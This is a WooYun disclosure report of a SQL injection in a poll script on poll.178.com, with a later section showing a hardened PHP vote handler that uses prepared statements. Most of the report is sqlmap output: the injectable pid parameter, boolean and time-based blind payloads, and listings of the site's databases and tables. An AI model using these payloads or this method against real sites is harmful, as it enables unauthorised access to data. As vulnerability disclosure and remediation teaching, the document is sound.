WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2014-07-17: Details sent to the vendor, awaiting vendor handling
2014-07-17: Vendor confirmed; details visible to the vendor only
2014-07-27: Details opened to core white hats and domain experts
2014-08-06: Details opened to regular white hats
2014-08-16: Details opened to intern white hats
2014-08-31: Details opened to the public

No gift, and it is all for nothing!

Injection:
http://poll.178.com:80//post_poll.php?pid=2628 (POST)vid=2628&vkey[]=20458&submit=
sqlmap identified the following injection points with a total of 684 HTTP(s) requests:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=2628 AND 4930=4930

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pid=2628 AND SLEEP(5)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=2628 AND 4930=4930

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pid=2628 AND SLEEP(5)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] information_schema
[*] poll
[*] poll_new
[*] test

Database: poll_new
[22 tables]
+---------------------------------------+
| act_body                              |
| act_key                               |
| act_userinfo                          |
| act_userlog                           |
| poll_cache                            |
| poll_contentcategory                  |
| poll_contributiveness_body            |
| poll_contributiveness_cate            |
| poll_contributiveness_key             |
| poll_contributiveness_log             |
| poll_contributiveness_tag_info        |
| poll_fabu_link                        |
| poll_key                              |
| poll_record                           |
| poll_user_field                       |
| poll_usergroup                        |
| poll_vadminuser                       |
| poll_vbody                            |
| poll_vcategory                        |
| poll_vkey                             |
| poll_vlogs                            |
| poll_vmod                             |
+---------------------------------------+

Database: poll
[30 tables]
+---------------------------------------+
| act_body                              |
| act_key                               |
| act_userinfo                          |
| act_userlog                           |
| annual                                |
| poll_body                             |
| poll_cache                            |
| poll_contentcategory                  |
| poll_contributiveness_body            |
| poll_contributiveness_cate            |
| poll_contributiveness_key             |
| poll_contributiveness_log             |
| poll_contributiveness_tag_info        |
| poll_fabu_link                        |
| poll_fields                           |
| poll_fkey_info                        |
| poll_key                              |
| poll_key_extra                        |
| poll_logs                             |
| poll_record                           |
| poll_user_field                       |
| poll_user_fields                      |
| poll_user_log                         |
| poll_usergroup                        |
| poll_vadminuser                       |
| poll_vbody                            |
| poll_vcategory                        |
| poll_vkey                             |
| poll_vlogs                            |
| poll_vmod                             |
+---------------------------------------+

Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Filter the input. Frankly, your site has quite a few more injection points; look carefully and you will find plenty.
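The remediation above is one word, "filter", and sqlmap's boolean and time-based findings show why string filtering alone is the wrong fix: the pid value is being concatenated into SQL. The following is an added example, not code from the report or from 178.com, showing what a hardened handler for a vote endpoint like post_poll.php looks like in PHP: the integer parameter is validated before use, the vkey[] array is checked element by element, and every query is a PDO prepared statement so the value is bound as data rather than parsed as SQL. The table poll_record is on the page; its columns pid and vkey, the function names and the connection details are assumptions for illustration.

```php
<?php
// Added example (not the site's own code). Hardened poll-vote handler.
// Vulnerable pattern implied by the blind-injection findings on pid:
//     $sql = "SELECT * FROM poll_key WHERE pid=" . $_GET['pid'];
// A value such as "2628 AND SLEEP(5)" is then executed as SQL.
declare(strict_types=1);

// Accept only a positive integer. Arrays (e.g. vkey[]=...) and strings
// carrying SQL operators are rejected instead of being "filtered".
function validate_poll_id(mixed $raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// vkey may legitimately be a list of option ids; every element must pass
// the same integer check, otherwise the whole request is rejected.
function validate_option_ids(mixed $raw): ?array
{
    $list = is_array($raw) ? $raw : [$raw];
    $out = [];
    foreach ($list as $item) {
        $id = validate_poll_id($item);
        if ($id === null) {
            return null;
        }
        $out[] = $id;
    }
    return $out;
}

// Column names pid/vkey on poll_record are assumed for this example.
function record_vote(PDO $db, int $pid, array $vkeys): int
{
    // Use real server-side prepares so bound values never touch the SQL text.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

    $stmt = $db->prepare('SELECT COUNT(*) FROM poll_key WHERE pid = :pid');
    $stmt->execute([':pid' => $pid]);
    if ((int) $stmt->fetchColumn() === 0) {
        throw new RuntimeException('unknown poll');
    }

    $ins = $db->prepare('INSERT INTO poll_record (pid, vkey) VALUES (:pid, :vkey)');
    foreach ($vkeys as $vkey) {
        $ins->execute([':pid' => $pid, ':vkey' => $vkey]);
    }
    return count($vkeys);
}

// Request handling: reject early with a 400 rather than trying to sanitize.
$pid   = validate_poll_id($_GET['pid'] ?? null);
$vkeys = validate_option_ids($_POST['vkey'] ?? null);
if ($pid === null || $vkeys === null) {
    http_response_code(400);
    exit('invalid parameters');
}

// Connection parameters are placeholders for the example.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=poll;charset=utf8mb4',
    'poll_app_user',
    'PLACEHOLDER_PASSWORD',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);
echo record_vote($db, $pid, $vkeys) . " votes recorded\n";
```

Two design points worth noting. First, validation with FILTER_VALIDATE_INT rejects both sqlmap's payloads (`2628 AND 4930=4930` is not an integer) and the `vkey[]` array trick from the original request, whereas a blacklist of keywords like AND or SLEEP would not survive encoding variations. Second, the database user for the application should be limited to the poll schema; sqlmap's ability to enumerate information_schema, poll, poll_new and test shows the compromised account could read every database on the server.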
Severity: High
Vulnerability Rank: 15
Confirmed: 2014-07-17 11:52
Thanks! We have too many legacy projects; forgive us.
None yet